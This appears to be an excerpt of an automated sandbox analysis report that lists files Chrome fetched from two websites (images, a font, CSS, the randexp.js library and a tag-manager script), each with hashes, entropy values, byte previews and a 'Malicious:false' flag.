                                                                                                                                            SSDEEP:12:t4/KYRN+pYR6plffG2MDIjuNo9LCWhY0C6gRni7QHKczKaF6U8V:t4LRN+qRgd6D9oJCd0BglNOaV8V
                                                                                                                                            MD5:736523B4E813D438D957906EB22E8CB7
                                                                                                                                            SHA1:40E40DE0DDB4CC65540C966AE5934F7D3649BACF
                                                                                                                                            SHA-256:EA0F06D240CE5ED4440A756E020C0E191E8346DE7A76781E545C091FC5B874C0
                                                                                                                                            SHA-512:F39D2E47D1C68A727B0EBAB7BD04F4FA03F80EAF6EDCE19F6FF1D4F42ABADD8EB4F457A1DF8EE2F09F59FD51CD91D5F160CDE7A0593B136A69DFE6AD262D69AF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="64px" height="64px" viewBox="0 0 64 64" version="1.1"><rect fill="#f34b1d" cx="32" width="64" height="64" cy="32" r="32"/><text x="50%" y="50%" style="color: #ffffff; line-height: 1;font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif;" alignment-baseline="middle" text-anchor="middle" font-size="28" font-weight="400" dy=".1em" dominant-baseline="middle" fill="#ffffff">AJ</text></svg>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):35786
                                                                                                                                            Entropy (8bit):5.058073854893359
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:hToogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkf1WcrScuH9Ye3YdersR8Q5oqWjfuogF:h0DKAaZtJsOodwuhx5P6mqjDggJkLRn
                                                                                                                                            MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                                                                                            SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                                                                                            SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                                                                                            SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/xyAq43pQ3AarsEuef30
                                                                                                                                            Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25216
                                                                                                                                            Entropy (8bit):7.947339442168474
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:BTwdm3bbEPDrEQT87zOyJ0WsnoU+RBshw:64LQXEN7DJGSRBs
                                                                                                                                            MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                                            SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                                            SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                                            SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9648
                                                                                                                                            Entropy (8bit):7.9099172475143416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:gwTgBYruFELhYmwd93mjW0l9OsENOLWcXdN4CLrHZfTtjOZgYM5cWjAaP6:gwTgBxaYmo5mS0l9OsuOL3NNVLlfTtjE
                                                                                                                                            MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                            SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                            SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                            SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240
                                                                                                                                            Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):43596
                                                                                                                                            Entropy (8bit):7.9952701440723475
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                                                                                            MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                            SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                            SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                            SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/GDSherpa-vf.woff2
                                                                                                                                            Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):892
                                                                                                                                            Entropy (8bit):5.863167355052868
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:qaPlKKVkz1f+tPUgo/KQGbEZAuYED9qk9neYVxyzyb7PumHe/Q/:qElbQ1f+Bo/LfAuYEJxnHDyzqyQ/
                                                                                                                                            MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                            SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                            SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                            SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132
                                                                                                                                            Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10017)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10245
                                                                                                                                            Entropy (8bit):5.437589264532084
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                                                                                                            MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                                            SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                                            SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                                            SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241106%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241106T155559Z&X-Amz-Expires=300&X-Amz-Signature=c35f79085d4530d97feeeba7c17e7b0be2f621881773f7b10a56f304666d5b45&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                                            Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2345)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):199356
                                                                                                                                            Entropy (8bit):5.527011212241135
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:XVwizDGLETutrA0m5yptcY0/H8+bEQDmKD0C8rT/Jy:nGLgutuYjWx0C8rT/I
                                                                                                                                            MD5:10755E6D896D1955655109B7C0F42B85
                                                                                                                                            SHA1:9B4C2E8DC73963012DC0F260ADB6DBA5C49D7A7E
                                                                                                                                            SHA-256:05DB58A531B396690C5013DA9F9778D1103787772672E7D9ED2730381A4CC093
                                                                                                                                            SHA-512:94DCD082F1606E62B114BE693C277A23E1EF2A6B38E72612B4D597B6F83433104911C3B4BE231D73862AAF8CF1A8F7E7E6C7C539ADFA978F38A51C767EA4909C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":"\u003Cscript defer data-domain=\"marmof.com\" data-gtmsrc=\"https:\/\/plausible.io\/js\/script.js\" type=\"text\/gtmscript\"\u003E\u003C\/script\u003E","vtp_supportDocumentWrite":false,"vtp_enableIframeMode":false,"vtp_enableEditJsMacroBehavior":false,"tag_id":3}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10017)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10245
                                                                                                                                            Entropy (8bit):5.437589264532084
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                                                                                                            MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                                            SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                                            SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                                            SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1298
                                                                                                                                            Entropy (8bit):6.665390877423149
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:L+aPlKKVkz1f+tPUgo/KQGbEZAu6hZjJ+uvRGumDyqCuiRFqB6dhQiZmh7:L+ElbQ1f+Bo/LfAuk4uvR5mDymiRFqBN
                                                                                                                                            MD5:32CA2081553E969F9FDD4374134521AD
                                                                                                                                            SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                                                                            SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                                                                            SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10796
                                                                                                                                            Entropy (8bit):7.946024875001343
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                                                                                                            MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                            SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                            SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                            SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9648
                                                                                                                                            Entropy (8bit):7.9099172475143416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:gwTgBYruFELhYmwd93mjW0l9OsENOLWcXdN4CLrHZfTtjOZgYM5cWjAaP6:gwTgBxaYmo5mS0l9OsuOL3NNVLlfTtjE
                                                                                                                                            MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                            SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                            SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                            SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1298
                                                                                                                                            Entropy (8bit):6.665390877423149
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:L+aPlKKVkz1f+tPUgo/KQGbEZAu6hZjJ+uvRGumDyqCuiRFqB6dhQiZmh7:L+ElbQ1f+Bo/LfAuk4uvR5mDymiRFqBN
                                                                                                                                            MD5:32CA2081553E969F9FDD4374134521AD
                                                                                                                                            SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                                                                            SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                                                                            SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227
                                                                                                                                            Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (37673)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):364728
                                                                                                                                            Entropy (8bit):5.542315360727351
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:exjICRAU/CMDUUsnnZefYbh5eNGQTOvXyBmglrIcQ:aJAUpUhnnZWEh5esQCvXyTrXQ
                                                                                                                                            MD5:88EEB9382B45FB660C241ADD89B7EA81
                                                                                                                                            SHA1:F9D941CF826EFEE9191ADB90A75715439BCF6EB6
                                                                                                                                            SHA-256:F14CD52CCC7F1DF4DCA05AB33AC62DA2E60D26117944DEF08692B11D64102080
                                                                                                                                            SHA-512:2A6F5CED0B2C5292E180E4CE8E499983B399896D7D379AB9C9E413EF2707CE4461FEC4977E3C3B91122D2ECE43EC91B246284847CE11BCCF9EA61C7FA23A0BB0
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/build/assets/app-49265ad1.js
